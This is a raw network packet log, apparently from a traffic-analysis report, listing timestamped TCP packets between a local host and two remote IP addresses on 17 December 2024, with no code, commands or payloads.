                                                  Dec 17, 2024 16:37:04.617501974 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:37:04.673903942 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:37:04.851032972 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:37:04.856667995 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:37:04.978390932 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:37:04.978552103 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:37:05.098213911 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:37:05.312051058 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:37:05.355012894 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:37:05.475325108 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:37:05.504156113 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:37:05.548571110 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:37:05.926523924 CET4970880192.168.2.5178.237.33.50
                                                  Dec 17, 2024 16:37:06.046787024 CET8049708178.237.33.50192.168.2.5
                                                  Dec 17, 2024 16:37:06.046894073 CET4970880192.168.2.5178.237.33.50
                                                  Dec 17, 2024 16:37:06.047321081 CET4970880192.168.2.5178.237.33.50
                                                  Dec 17, 2024 16:37:06.167901039 CET8049708178.237.33.50192.168.2.5
                                                  Dec 17, 2024 16:37:07.329452038 CET8049708178.237.33.50192.168.2.5
                                                  Dec 17, 2024 16:37:07.330709934 CET4970880192.168.2.5178.237.33.50
                                                  Dec 17, 2024 16:37:07.341103077 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:37:07.506983042 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:37:07.909003019 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:37:07.911688089 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:37:08.031725883 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:37:08.329230070 CET8049708178.237.33.50192.168.2.5
                                                  Dec 17, 2024 16:37:08.330615044 CET4970880192.168.2.5178.237.33.50
                                                  Dec 17, 2024 16:37:37.925338030 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:37:37.926908016 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:37:38.046669006 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:38:08.046825886 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:38:08.048185110 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:38:08.171428919 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:38:38.067914963 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:38:38.072237015 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:38:38.191757917 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:38:55.736692905 CET4970880192.168.2.5178.237.33.50
                                                  Dec 17, 2024 16:38:56.049096107 CET4970880192.168.2.5178.237.33.50
                                                  Dec 17, 2024 16:38:56.658451080 CET4970880192.168.2.5178.237.33.50
                                                  Dec 17, 2024 16:38:57.861530066 CET4970880192.168.2.5178.237.33.50
                                                  Dec 17, 2024 16:39:00.330324888 CET4970880192.168.2.5178.237.33.50
                                                  Dec 17, 2024 16:39:05.142854929 CET4970880192.168.2.5178.237.33.50
                                                  Dec 17, 2024 16:39:08.172313929 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:08.173650026 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:08.293536901 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:14.830368996 CET4970880192.168.2.5178.237.33.50
                                                  Dec 17, 2024 16:39:38.171968937 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:38.176039934 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:38.296431065 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:54.795728922 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:54.797935009 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:54.877737999 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:54.917680979 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:54.917833090 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:54.925398111 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:54.987893105 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:54.991734028 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:55.034317017 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:55.045208931 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:55.111927986 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:55.112046957 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:55.149950027 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:55.269697905 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.056402922 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.158723116 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:56.265494108 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.293541908 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.298015118 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:56.361838102 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:56.417686939 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.419595957 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:56.501693010 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.507878065 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:56.539706945 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.549508095 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:56.627585888 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.627643108 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:56.669243097 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.669259071 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.669277906 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.669286966 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.669312000 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:56.669363976 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:56.669389009 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.669399977 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.669409990 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.669445992 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:56.669497013 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.669507980 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.747337103 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.789144993 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.789215088 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.789241076 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.789252996 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.789329052 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.789422989 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.789475918 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.789534092 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:56.789576054 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.315494061 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:57.435245037 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.652977943 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.687310934 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:57.688498020 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:57.808844090 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.808876991 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.808887959 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.808947086 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.808957100 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.809034109 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.809042931 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.809132099 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.809139967 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.809176922 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.809185028 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.859159946 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.859201908 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.859213114 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.859263897 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.859308958 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.899544954 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.928466082 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.928601027 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.331145048 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:58.451457024 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.680005074 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.731981039 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:58.733876944 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:58.851788044 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.851808071 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.851820946 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.851830006 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.851865053 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.851901054 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852050066 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852091074 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852128983 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852138996 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852219105 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852229118 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852255106 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.852277040 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.853394032 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.853410006 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.853451014 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.853579044 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.971400023 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.971419096 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.971438885 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:58.971447945 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:59.346534014 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:59.466268063 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:59.542332888 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:59.542450905 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:59.547579050 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:59.547635078 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:59.547692060 CET4998456887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:39:59.667383909 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:00.362195015 CET4998356887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:00.481997967 CET5688749983192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:00.518928051 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:00.658854961 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:01.201109886 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:01.202168941 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:01.203062057 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:01.203094006 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:01.322882891 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:01.326596022 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:01.329703093 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:01.449990034 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.445908070 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.502444983 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.679790974 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.685882092 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.733932972 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.805905104 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.805982113 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.854001045 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854017973 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854063034 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854121923 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854124069 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.854132891 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854171991 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854171991 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.854197025 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.854238987 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:02.854311943 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854322910 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.854331970 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.925595045 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974164009 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974180937 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974193096 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974236965 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974267006 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974343061 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974387884 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974466085 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:02.974509001 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:06.199767113 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:06.199929953 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:06.199929953 CET4998556887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:06.319658041 CET5688749985192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:08.311168909 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:08.314953089 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:08.435683966 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:10.426235914 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:10.427656889 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.471282005 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.547457933 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:10.547566891 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.551361084 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.641644001 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:10.647183895 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.671149015 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:10.690043926 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.767035007 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:10.767122984 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.773159981 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:10.896028996 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:11.668829918 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:11.721263885 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:11.886948109 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:11.907866955 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:11.913460016 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:11.940037012 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.033494949 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.035645008 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.122387886 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.128027916 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.155487061 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.172152996 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.248127937 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.249686956 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.291912079 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.291928053 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.291990995 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.292037010 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.292049885 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.292093039 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.292228937 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.292242050 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.292298079 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:12.292359114 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.292383909 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.292406082 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.369555950 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.411916971 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.411936045 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412049055 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412065029 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412163973 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412328005 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412343025 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412359953 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.412543058 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:12.924701929 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:13.044692039 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.439743042 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.484307051 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:13.485522032 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:13.605035067 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605076075 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605099916 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605123043 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605145931 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605205059 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605226994 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605248928 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605271101 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605293036 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605314016 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605371952 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605393887 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605415106 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.605587959 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.724783897 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.724842072 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.724874973 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:13.940259933 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:14.060461044 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.270682096 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.315035105 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:14.317311049 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:14.318536043 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:14.438215017 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438239098 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438330889 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438344955 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438360929 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438417912 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438519955 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438534021 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.438549995 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.557816029 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.557867050 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.557976961 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558007956 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558034897 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558130980 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558161020 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558198929 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558226109 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558303118 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558370113 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558442116 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.558492899 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:14.956016064 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:15.189198017 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.400918961 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.437552929 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:15.438851118 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:15.557591915 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557632923 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557646990 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557661057 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557812929 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557826042 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557857037 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.557883978 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.558326960 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.558339119 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.649605036 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.649655104 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.650154114 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677086115 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677104950 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677117109 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677171946 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677185059 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677308083 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677320004 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:15.677398920 CET5688749987192.210.150.17192.168.2.5
